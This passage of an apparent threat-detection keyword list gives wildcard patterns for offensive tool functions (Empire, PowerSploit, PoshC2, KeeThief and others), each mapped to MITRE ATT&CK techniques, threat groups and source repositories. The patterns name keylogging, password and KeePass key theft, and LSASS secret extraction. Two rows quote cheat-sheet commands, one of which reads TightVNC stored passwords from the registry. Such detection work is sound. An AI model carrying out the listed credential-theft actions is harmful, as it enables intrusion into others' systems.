- TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard 
Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-SiteListPassword.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-GPPPassword*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-GPPPassword.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1124,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - 
Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-GPPPassword.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*Get-HeadersWithPrtCookies*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*GetHijackableDllName*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*Get-ImageNtHeaders*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1103,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*get-implantworkingdirectory*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-InactiveDomainAdmins*,offensive_tool_keyword,HoneypotBuster,Microsoft PowerShell 
module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host,T1083 - T1059.001 - T1112,TA0007 - TA0002,N/A,N/A,Lateral Movement,https://github.com/JavelinNetworks/HoneypotBuster,1,0,N/A,8,3,270,60,2017-12-05T13:03:11Z,2017-07-22T15:40:44Z -*Get-InternetExplorerBookmarks*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-InternetExplorerHistory*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-ItemProperty -Path HKLM:\Software\TightVNC\Server -Name *Password* | select -ExpandProperty Password*,offensive_tool_keyword,AD exploitation cheat sheet,TightVNC password (convert to Hex then decrypt with e.g.: https://github.com/frizb/PasswordDecrypts),T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 
*RunAsPPL*,offensive_tool_keyword,AD exploitation cheat sheet,Sometimes LSASS is configured to run as a protected process (PPL). You can query this with PowerShell as follows.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,POST Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Get-KeePassConfigTrigger*,offensive_tool_keyword,Keethief,Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.,T1003 - T1213 - T1215 - T1566,TA0005 - TA0007 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/KeeThief,1,1,N/A,N/A,9,863,151,2020-11-18T18:35:21Z,2016-07-10T19:11:23Z -*Get-KeePassDatabaseKey*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-KeePassDatabaseKey*,offensive_tool_keyword,Keethief,Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.,T1003 - T1213 - T1215 - T1566,TA0005 - TA0007 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/KeeThief,1,1,N/A,N/A,9,863,151,2020-11-18T18:35:21Z,2016-07-10T19:11:23Z -*Get-KeePassINIFields*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-KeePassXMLFields*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-KeystrokeData*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-Keystrokes *,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft 
PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-Keystrokes*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1067,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*get-keystrokes*,offensive_tool_keyword,poshc2,keywords from 
poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-Keystrokes*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-Killdate*,offensive_tool_keyword,empire,empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*get-killdate*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-KIWI_KERBEROS_LOGON_SESSION*,offensive_tool_keyword,powerextract,This tool is able to parse 
memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process,T1003 - T1055 - T1003.001 - T1055.012,TA0007 - TA0002,N/A,N/A,Credential Access,https://github.com/powerseb/PowerExtract,1,0,N/A,N/A,1,99,14,2023-07-19T14:24:41Z,2021-12-11T15:24:44Z -*Get-LastLoggedon -*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-LastLoggedOn*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*getLocalAdm*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*Get-LoggedOnLocal -*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-LoggedonLocal -ComputerName *,greyware_tool_keyword,powershell,PowerView get Locally logged users on a machine,T1069.002 - T1087.002 - T1018,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*Get-LsaRunAsPPLStatus*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - 
